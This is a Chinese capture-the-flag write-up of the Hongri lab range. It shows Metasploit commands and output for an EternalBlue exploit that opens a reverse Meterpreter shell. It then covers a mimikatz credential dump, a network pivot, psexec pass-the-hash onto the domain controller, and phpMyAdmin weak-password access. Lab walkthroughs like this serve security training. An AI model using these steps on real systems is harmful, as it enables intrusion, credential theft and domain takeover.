红日靶场一

靶场信息：

file-20260327161710977

file-20260327133303428

靶场的相关说明：

file-20260327133400559

file-20260327133417571

一、端口扫描

使用工具 rustscan，命令：

rustscan -a 192.168.111.20 --top

结果：

PORT    STATE SERVICE      REASON
80/tcp  open  http         syn-ack ttl 127
135/tcp open  msrpc        syn-ack ttl 127
139/tcp open  netbios-ssn  syn-ack ttl 127
445/tcp open  microsoft-ds syn-ack ttl 127

二、永恒之蓝

看到 445 端口开着，条件反射去看看有没有存在永恒之蓝漏洞。

在 nmap 的脚本目录下找到对应检测脚本：

┌──(penv)─(zyf㉿kali)-[/usr/share/nmap/scripts]
└─$ ls | grep ms17-010
smb-vuln-ms17-010.nse

利用 nmap 验证：

nmap --script smb-vuln-ms17-010 192.168.111.20 -p 445

输出：

Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-26 21:38 CST
Nmap scan report for 192.168.111.20
Host is up (0.25s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

Nmap done: 1 IP address (1 host up) scanned in 4.90 seconds

确认永恒之蓝漏洞存在。

三、MSF

进入 MetaSploit：

msfconsole

查找对应模块：

msf6 > search ms17-010

输出：

#   Name                                           Disclosure Date  Rank     Check  Description
-   ----                                           ---------------  ----     -----  -----------
0   exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1     \_ target: Automatic Target                  .                .        .      .
2     \_ target: Windows 7                         .                .        .      .
3     \_ target: Windows Embedded Standard 7       .                .        .      .
4     \_ target: Windows Server 2008 R2            .                .        .      .
5     \_ target: Windows 8                         .                .        .      .
6     \_ target: Windows 8.1                       .                .        .      .
7     \_ target: Windows Server 2012               .                .        .      .
8     \_ target: Windows 10 Pro                    .                .        .      .
9     \_ target: Windows 10 Enterprise Evaluation  .                .        .      .
10  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
11    \_ target: Automatic                         .                .        .      .
12    \_ target: PowerShell                        .                .        .      .
13    \_ target: Native upload                     .                .        .      .
14    \_ target: MOF upload                        .                .        .      .
15    \_ AKA: ETERNALSYNERGY                       .                .        .      .
16    \_ AKA: ETERNALROMANCE                       .                .        .      .
17    \_ AKA: ETERNALCHAMPION                      .                .        .      .
18    \_ AKA: ETERNALBLUE                          .                .        .      .
19  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
20    \_ AKA: ETERNALSYNERGY                       .                .        .      .
21    \_ AKA: ETERNALROMANCE                       .                .        .      .
22    \_ AKA: ETERNALCHAMPION                      .                .        .      .
23    \_ AKA: ETERNALBLUE                          .                .        .      .
24  auxiliary/scanner/smb/smb_ms17_010             .                normal   No     MS17-010 SMB RCE Detection
25    \_ AKA: DOUBLEPULSAR                         .                .        .      .
26    \_ AKA: ETERNALBLUE                          .                .        .      .
27  exploit/windows/smb/smb_doublepulsar_rce       2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution
28    \_ target: Execute payload (x64)             .                .        .      .
29    \_ target: Neutralize implant                .                .        .      .

利用第0个：

use 0

查看需要填写什么信息：

options

输出：

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT          445              yes       The target port (TCP)
   SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.85.142   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

将 Required 为 yes 的都给填上：

msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.111.20
RHOSTS => 192.168.111.20
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.111.25
LHOST => 192.168.111.25

运行 payload：

run

利用成功：

msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[-] Handler failed to bind to 192.168.111.25:4444:-  -
[*] Started reverse TCP handler on 0.0.0.0:4444 
[*] 192.168.111.20:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.111.20:445    - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.111.20:445    - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.111.20:445 - The target is vulnerable.
[*] 192.168.111.20:445 - Connecting to target for exploitation.
[+] 192.168.111.20:445 - Connection established for exploitation.
[+] 192.168.111.20:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.111.20:445 - CORE raw buffer dump (42 bytes)
[*] 192.168.111.20:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 192.168.111.20:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 192.168.111.20:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 192.168.111.20:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.111.20:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.111.20:445 - Sending all but last fragment of exploit packet
[*] 192.168.111.20:445 - Starting non-paged pool grooming
[+] 192.168.111.20:445 - Sending SMBv2 buffers
[+] 192.168.111.20:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.111.20:445 - Sending final SMBv2 buffers.
[*] 192.168.111.20:445 - Sending last fragment of exploit packet!
[*] 192.168.111.20:445 - Receiving response from exploit packet
[+] 192.168.111.20:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.111.20:445 - Sending egg to corrupted connection.
[*] 192.168.111.20:445 - Triggering free of corrupted buffer.
[*] Sending stage (203846 bytes) to 192.168.111.20
[*] Meterpreter session 1 opened (10.8.0.6:4444 -> 192.168.111.20:1581) at 2026-03-26 21:47:33 +0800
[+] 192.168.111.20:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.111.20:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.111.20:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter >

四、内网信息搜集

1、域控信息

在 meterpreter shell 中可以直接使用后渗透信息收集模块即 post 模块：

meterpreter > run post/windows/gather/enum_domain
[+] Domain FQDN: god.org
[+] Domain NetBIOS Name: GOD
[+] Domain Controller: owa.god.org (IP: 192.168.52.138)

说明：

域控：owa.god.org (IP: 192.168.52.138)
域名：god.org

关于为什么选择这个模块：

说实话，目前最快的方法是直接问 AI：

file-20260327093900920

秒出，若硬是要自己找的话也有两个方案：

Google
MSF 自带的 Search 功能，然后看模块的 Description

先说 Google，所搜关键词：

metasploit enumerate domain controller module

file-20260327094033265

file-20260327094051382

但是，远不如 AI 的便捷、快速、准确，并且 AI 还能继续追问（……）

再说说 search 功能，首先需要了解 Post 模块名的命名格式：

post / <平台> / <功能类别> / <名称>

我们的目标：

平台：windows
功能类别：gather，即收集信息
名称：enum_domain，这是两个单词的组合即“enumerate(enum) + domain”，意为枚举域名

通过 search 命令可以搜出模糊结果（使用 search 先要用命令 bg 退出当前 session，否则会和 metapreter 中的 search 冲突）：

msf6 exploit(windows/smb/ms17_010_eternalblue) > search enum domain gather type:post platform:windows

Matching Modules
================

   #   Name                                                 Disclosure Date  Rank    Check  Description
   -   ----                                                 ---------------  ----    -----  -----------
   0   post/multi/gather/dns_srv_lookup                     .                normal  No     Multi Gather DNS Service Record Lookup Scan
   1   post/windows/gather/enum_ad_to_wordlist              .                normal  No     Windows Active Directory Wordlist Builder
   2   post/windows/gather/enum_ad_bitlocker                .                normal  No     Windows Gather Active Directory BitLocker Recovery
   3   post/windows/gather/enum_ad_computers                .                normal  No     Windows Gather Active Directory Computers
   4   post/windows/gather/enum_ad_groups                   .                normal  No     Windows Gather Active Directory Groups
   5   post/windows/gather/enum_ad_managedby_groups         .                normal  No     Windows Gather Active Directory Managed Groups
   6   post/windows/gather/enum_ad_service_principal_names  .                normal  No     Windows Gather Active Directory Service Principal Names
   7   post/windows/gather/enum_ad_user_comments            .                normal  No     Windows Gather Active Directory User Comments
   8   post/windows/gather/enum_ad_users                    .                normal  No     Windows Gather Active Directory Users
   9   post/windows/gather/credentials/enum_cred_store      .                normal  No     Windows Gather Credential Store Enumeration and Decryption Module
   10  post/windows/gather/enum_domains                     .                normal  No     Windows Gather Domain Enumeration
   11  post/windows/gather/enum_domain_users                .                normal  No     Windows Gather Enumerate Active Domain Users
   12  post/windows/gather/enum_computers                   .                normal  No     Windows Gather Enumerate Computers
   13  post/windows/gather/enum_domain                      .                normal  No     Windows Gather Enumerate Domain
   14  post/windows/gather/enum_tokens                      .                normal  No     Windows Gather Enumerate Domain Admin Tokens (Token Hunter)
   15  post/windows/gather/enum_domain_group_users          .                normal  No     Windows Gather Enumerate Domain Group
   16  post/windows/gather/enum_domain_tokens               .                normal  No     Windows Gather Enumerate Domain Tokens
   17  post/windows/gather/credentials/gpp                  .                normal  No     Windows Gather Group Policy Preference Saved Passwords
   18  post/windows/gather/credentials/imail                .                normal  No     Windows Gather IPSwitch iMail User Data Enumeration
   19  post/windows/gather/local_admin_search_enum          .                normal  No     Windows Gather Local Admin Search

通过 Description 可以锁定到：

10  post/windows/gather/enum_domains                     .                normal  No     Windows Gather Domain Enumeration
 13  post/windows/gather/enum_domain                      .                normal  No     Windows Gather Enumerate Domain

通过 info 命令查看：

msf6 exploit(windows/smb/ms17_010_eternalblue) > info post/windows/gather/enum_domain

       Name: Windows Gather Enumerate Domain
     Module: post/windows/gather/enum_domain
   Platform: Windows
       Arch: 
       Rank: Normal

Provided by:
  Joshua Abraham <jabra@rapid7.com>

Module stability:
 crash-safe

Compatible session types:
  Meterpreter
  Powershell
  Shell

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SESSION                   yes       The session to run this module on

Description:
  This module identifies the primary Active Directory domain name
  and domain controller.


View the full module info with the info -d command.

emm，还是觉得 AI 好用，但是若处于离线状态，search 也能作为后备选项。

2、网络接口信息

ipconfig /all

Interface  1
============
Name         : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU          : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff


Interface 11
============
Name         : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:50:56:b1:31:9d
MTU          : 1500
IPv4 Address : 192.168.52.143
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::ec33:dadb:2e55:9492
IPv6 Netmask : ffff:ffff:ffff:ffff::


Interface 12
============
Name         : Microsoft ISATAP Adapter
Hardware MAC : 00:00:00:00:00:00
MTU          : 1280
IPv6 Address : fe80::5efe:c0a8:348f
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff


Interface 15
============
Name         : Microsoft ISATAP Adapter #2
Hardware MAC : 00:00:00:00:00:00
MTU          : 1280


Interface 16
============
Name         : Microsoft ISATAP Adapter #3
Hardware MAC : 00:00:00:00:00:00
MTU          : 1280


Interface 17
============
Name         : Microsoft ISATAP Adapter #4
Hardware MAC : 00:00:00:00:00:00
MTU          : 1280
IPv6 Address : fe80::5efe:a9fe:81ba
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff


Interface 18
============
Name         : Microsoft ISATAP Adapter #5
Hardware MAC : 00:00:00:00:00:00
MTU          : 1280
IPv6 Address : fe80::5efe:c0a8:6f14
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff


Interface 22
============
Name         : TAP-Windows Adapter V9
Hardware MAC : 00:ff:44:8d:cb:b5
MTU          : 1500
IPv4 Address : 169.254.135.129
IPv4 Netmask : 255.255.0.0
IPv6 Address : fe80::480f:c25c:1f43:8781
IPv6 Netmask : ffff:ffff:ffff:ffff::


Interface 23
============
Name         : TAP-Windows Adapter V9 #2
Hardware MAC : 00:ff:56:0b:ea:fc
MTU          : 1500
IPv4 Address : 169.254.99.189
IPv4 Netmask : 255.255.0.0
IPv6 Address : fe80::4d82:616f:441c:63bd
IPv6 Netmask : ffff:ffff:ffff:ffff::


Interface 24
============
Name         : Npcap Loopback Adapter
Hardware MAC : 02:00:4c:4f:4f:50
MTU          : 1500
IPv4 Address : 169.254.129.186
IPv4 Netmask : 255.255.0.0
IPv6 Address : fe80::b461:ccad:e30f:81ba
IPv6 Netmask : ffff:ffff:ffff:ffff::


Interface 26
============
Name         : Intel(R) PRO/1000 MT Network Connection #3
Hardware MAC : 00:50:56:b1:d7:01
MTU          : 1500
IPv4 Address : 192.168.111.20
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::ecdc:7ab8:c0fb:cfc5
IPv6 Netmask : ffff:ffff:ffff:ffff::

忽略虚拟/无关网卡，有两个关键有效信息为：

Interface 11
============
Name         : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:50:56:b1:31:9d
MTU          : 1500
IPv4 Address : 192.168.52.143
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::ec33:dadb:2e55:9492
IPv6 Netmask : ffff:ffff:ffff:ffff::

Interface 26
============
Name         : Intel(R) PRO/1000 MT Network Connection #3
Hardware MAC : 00:50:56:b1:d7:01
MTU          : 1500
IPv4 Address : 192.168.111.20
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::ecdc:7ab8:c0fb:cfc5
IPv6 Netmask : ffff:ffff:ffff:ffff::

发现本机是双网卡，外网（192.168.111.20），内网（192.168.52.143），刚好可以以此机为跳板机去连接域控。

五、横向移动

1、凭证收集

当前用户为 SYSTEM 权限：

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

抓凭据：

# 加载 kiwi 模块（内置 mimikatz）
meterpreter > load kiwi

# 抓取所有凭证（明文+Hash）
meterpreter > creds_all

输出：

meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username       Domain  LM                                NTLM                              SHA1
--------       ------  --                                ----                              ----
Administrator  GOD     d29aa94631a1dca1aad3b435b51404ee  933a9b5b44dab4530d86d83a6b47b7d1  c3e55f8634feec6635faef5eba3b04a9b08e5ed9
STU1$          GOD                                       c8175d606297e4f2feebbbda926cd9f7  b328ba45ca1570739b04ba3cb235a5ce245dd30f

wdigest credentials
===================

Username       Domain  Password
--------       ------  --------
(null)         (null)  (null)
Administrator  GOD     qwe@123
STU1$          GOD     23 92 0a b9 c4 88 e1 9f cd be cf fb 83 cf 00 cc 56 13 7e 22 f0 79 50 60 32 c5 97 97 02 7e 29 fc 0a 5f 50 b0 6e bf 17 40 8c 50 a7 75 c1 68 f1 ec 4c 3c b3 ca d4 87 d7 48 54 b3 02 56 a0 6e 68 17 86 42 34 40 35 41 79 d6 41 11 4c e5 57 dc 2c 93 08 d3 51 3a 40 c4 26 7c 69 2d bb c0 f4 28 1e 37 9d c2 40 2f aa 22 e9 ff 9a 21 f6 9f 56 a6 35 3d ae a1 10 38 a7 33 70 3c b1 6e 2c 60 3d 20 fc 5b 67 e2 21 4c 8b 67 18 da be d0 10 c2 27 0c d2 fa 05 28 eb 4b b9 fa 58 18 fa 97 f9 d6 9f ae f6 7e 4a 6c 2d 9d f3 6e a5 c1 d3 66 73 22 39 df c5 57 ed 10 02 24 74 77 9e 9f ea 56 8f 95 46 f9 0a 05 17 51 62 8d 40 15 1d b6 f7 b6 43 d6 3e 38 2d 4f 46 f9 ef 5f d2 c2 dc 39 d7 f7 06 25 87 3e 43 bc e1 cd 5e 2b 26 38 c7 af 28 e6 2f 41 e9 a7 f3 7a

tspkg credentials
=================

Username       Domain  Password
--------       ------  --------
Administrator  GOD     qwe@123

kerberos credentials
====================

Username       Domain   Password
--------       ------   --------
(null)         (null)   (null)
Administrator  GOD.ORG  qwe@123
stu1$          GOD.ORG  23 92 0a b9 c4 88 e1 9f cd be cf fb 83 cf 00 cc 56 13 7e 22 f0 79 50 60 32 c5 97 97 02 7e 29 fc 0a 5f 50 b0 6e bf 17 40 8c 50 a7 75 c1 68 f1 ec 4c 3c b3 ca d4 87 d7 48 54 b3 02 56 a0 6e 68 17 86 42 34 40 35 41 79 d6 41 11 4c e5 57 dc 2c 93 08 d3 51 3a 40 c4 26 7c 69 2d bb c0 f4 28 1e 37 9d c2 40 2f aa 22 e9 ff 9a 21 f6 9f 56 a6 35 3d ae a1 10 38 a7 33 70 3c b1 6e 2c 60 3d 20 fc 5b 67 e2 21 4c 8b 67 18 da be d0 10 c2 27 0c d2 fa 05 28 eb 4b b9 fa 58 18 fa 97 f9 d6 9f ae f6 7e 4a 6c 2d 9d f3 6e a5 c1 d3 66 73 22 39 df c5 57 ed 10 02 24 74 77 9e 9f ea 56 8f 95 46 f9 0a 05 17 51 62 8d 40 15 1d b6 f7 b6 43 d6 3e 38 2d 4f 46 f9 ef 5f d2 c2 dc 39 d7 f7 06 25 87 3e 43 bc e1 cd 5e 2b 26 38 c7 af 28 e6 2f 41 e9 a7 f3 7a

查看域管理员组的成员：

meterpreter > run post/windows/gather/enum_domain_group_users GROUP="Domain Admns"
[*] Running module against STU1 (192.168.111.20)
[*] Found 2 users in 'god.org\Domain Admins' group.
[*]     GOD\Administrator
[*]     GOD\OWA$
[*] Current session running as god.org\SYSTEM is not a member of god.org\Domain Admins

由上述信息得：

域管账号：
- 用户名：Administrator
- 密码：qwe@123

2、路由

注意：不要把这里的“路由”和路由器中的“路由”概念混淆。这里的“路由”其实和建立代理没啥区别，只是 MSF 借用了这个术语。

meterpreter > run autoroute -s 192.168.52.0/24

如此一来，攻击机和跳板机就建立了一条隧道，访问 192.168.52.0/24 的流量都会走这个隧道。

3、横向移动

先看看域控的端口开放情况，查找扫描模块：

msf6 auxiliary(scanner/portscan/syn) > search portscan type:auxiliary

Matching Modules
================

   #  Name                                              Disclosure Date  Rank    Check  Description
   -  ----                                              ---------------  ----    -----  -----------
   0  auxiliary/scanner/portscan/ftpbounce              .                normal  No     FTP Bounce Port Scanner
   1  auxiliary/scanner/natpmp/natpmp_portscan          .                normal  No     NAT-PMP External Port Scanner
   2  auxiliary/scanner/sap/sap_router_portscanner      .                normal  No     SAPRouter Port Scanner
   3  auxiliary/scanner/portscan/xmas                   .                normal  No     TCP "XMas" Port Scanner
   4  auxiliary/scanner/portscan/ack                    .                normal  No     TCP ACK Firewall Scanner
   5  auxiliary/scanner/portscan/tcp                    .                normal  No     TCP Port Scanner
   6  auxiliary/scanner/portscan/syn                    .                normal  No     TCP SYN Port Scanner
   7  auxiliary/scanner/http/wordpress_pingback_access  .                normal  No     Wordpress Pingback Locator


Interact with a module by name or index. For example info 7, use 7 or use auxiliary/scanner/http/wordpress_pingback_access

选择 tcp 扫描：

msf6 auxiliary(scanner/portscan/syn) > use 5

大家这里可以选择 syn 扫描，我这是因为开 msfconsole 的时候并不是 root 权限，导致无法使用（尴尬）。

由于 tcp扫描比较慢，我这直接扫关键的：

msf6 auxiliary(scanner/portscan/tcp) > set PORTS 3389,445
PORTS => 3389,445
msf6 auxiliary(scanner/portscan/tcp) > run
[+] 192.168.52.138:       - 192.168.52.138:445 - TCP OPEN
[*] 192.168.52.138:       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

3389 没有开，因此用不了远程桌面，但是 smb 服务开着，使用对应的模块连接：

msf6 auxiliary(scanner/portscan/tcp) > use exploit/windows/smb/psexec
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
msf6 exploit(windows/smb/psexec) > set RHOSTS 192.168.52.138
RHOSTS => 192.168.52.138
msf6 exploit(windows/smb/psexec) > set SMBUser Administrator
SMBUser => Administrator
msf6 exploit(windows/smb/psexec) > set SMBPass qwe@123
SMBPass => qwe@123
msf6 exploit(windows/smb/psexec) > set payload windows/x64/meterpreter/reverse_cp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > set LHOST 192.168.52.143
LHOST => 192.168.52.143
msf6 exploit(windows/smb/psexec) > run
[*] Started reverse TCP handler on 192.168.52.143:4444 via the meterpreter on session 4
[*] 192.168.52.138:445 - Connecting to the server...
[*] 192.168.52.138:445 - Authenticating to 192.168.52.138:445 as user 'Administrator'...
[*] 192.168.52.138:445 - Selecting PowerShell target
[*] 192.168.52.138:445 - Executing the payload...
[+] 192.168.52.138:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (203846 bytes) to 192.168.52.138
[*] Meterpreter session 5 opened (192.168.52.138:4444 -> 192.168.52.138:55687 via session 4) at 2026-03-27 15:32:59 +0800

meterpreter >

这里说一下踩过的坑，我一开始将 LHOST 设置成 192.168.111.25，然后失败了，失败的原因很简单：

路由建立后，我们访问域控是没有问题的，但是域控访问我们就无法做到了

解决方法：将 LHOST 设置成跳板机的内网（192.168.52.143）

由于隧道的建立 MSF 可以成功监听该地址：

[*] Started reverse TCP handler on 192.168.52.143:4444 via the meterpreter on session 4

那么，返回的 shell 可以自然地被 MSF 接收。

六、查找 Flag

直接用 search 搜 flag 的位置：

meterpreter > search -f flag*
Found 2 results...
==================

Path                                                                         Size (bytes)  Modified (UTC)
----                                                                         ------------  --------------
c:\Users\liukaifeng01\AppData\Roaming\Microsoft\Windows\Recent\flag.txt.lnk  515           2025-12-21 14:37:59 +0800
c:\flag.txt                                                                  32            2025-12-21 14:38:28 +0800

找到后用 cat 读取即可：

meterpreter > cat c:\\flag.txt

同样有个坑：在 Meterpreter 的 cat 命令中，反斜杠 \ 是转义字符。

当你输入单个 \ 时，Meterpreter 会把它当作转义符号的开头（比如 \n 表示换行、\t 表示制表符），而不是路径分隔符。

当你输入一个 windows 文件路径的时候，不应该写成：

C:\Users\Administrator\Desktop\flag.txt

应该写成：

C:\\Users\\Administrator\\Desktop\\flag.txt

七、其他解法

很多地方解法不唯一。

1、最终登入域控

上面查找凭证的地方，我们不仅看到了明文账密，还看到了：

Username       Domain  LM                                NTLM                              SHA1
--------       ------  --                                ----                              ----
Administrator  GOD     d29aa94631a1dca1aad3b435b51404ee  933a9b5b44dab4530d86d83a6b47b7d1  c3e55f8634feec6635faef5eba3b04a9b08e5ed9
STU1$          GOD                                       c8175d606297e4f2feebbbda926cd9f7  b328ba45ca1570739b04ba3cb235a5ce245dd30f

不需要明文密码，直接用 NTLM Hash 进行登入也是可以的：

msf6 auxiliary(scanner/portscan/tcp) > use exploit/windows/smb/psexec
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
msf6 exploit(windows/smb/psexec) > set SMBUser Administrator
SMBUser => Administrator
msf6 exploit(windows/smb/psexec) > set SMBPass aad3b435b51404eeaad3b435b51404ee933a9b5b44dab4530d86d83a6b47b7d1
SMBPass => aad3b435b51404eeaad3b435b51404ee:933a9b5b44dab4530d86d83a6b47b7d1
msf6 exploit(windows/smb/psexec) > set RHOSTS 192.168.52.138
RHOSTS => 192.168.52.138
msf6 exploit(windows/smb/psexec) > options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   SERVICE_DESCRIPTION                    no        Service description to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SMBSHARE                               no        The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share


   Used when connecting via an existing SESSION:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   no        The session to run this module on


   Used when making a new connection via RHOSTS:

   Name       Current Setting                                                    Required  Description
   ----       ---------------                                                    --------  -----------
   RHOSTS     192.168.52.138                                                     no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      445                                                                no        The target port (TCP)
   SMBDomain  .                                                                  no        The Windows domain to use for authentication
   SMBPass    aad3b435b51404eeaad3b435b51404ee:933a9b5b44dab4530d86d83a6b47b7d1  no        The password for the specified username
   SMBUser    Administrator                                                      no        The username to authenticate as


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.52.143   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(windows/smb/psexec) > run
[*] Started reverse TCP handler on 192.168.52.143:4444 via the meterpreter on session 4
[*] 192.168.52.138:445 - Connecting to the server...
[*] 192.168.52.138:445 - Authenticating to 192.168.52.138:445 as user 'Administrator'...
[*] 192.168.52.138:445 - Selecting PowerShell target
[*] 192.168.52.138:445 - Executing the payload...
[+] 192.168.52.138:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (203846 bytes) to 192.168.52.138
[*] Meterpreter session 6 opened (192.168.52.138:4444 -> 192.168.52.138:55770 via session 4) at 2026-03-27 16:04:02 +0800

meterpreter >

2、80 端口

对于跳板机，它除了永恒之蓝漏洞，80 端口也是突破点：

file-20260327160525073

目录扫描一下：

┌──(zyf㉿kali)-[~/sechelper]
└─$ ffuf -u http://192.168.111.20/FUZZ -w /usr/share/seclists/Discovery/Web-Content/combined_directories.txt -s 
phpmyadmin

能扫到后台管理页面：

file-20260327160904258

弱密码：

账号：root
密码：root

后续就是通过 MySQL 命令写入木马，然后蚁剑连接……

这一部分很多师傅都写过了，都挺详细的，我这就不再赘述了。

3、关于 C2

本 WP 并没有涉及到 C2，因为就通关靶场而言，C2 显得没有太必要了，但是如果各位师傅想熟悉真实场景的流程，但是值得走一遭的。

关于本题 C2 的使用，网上很多师傅也写了，我这不再赘述。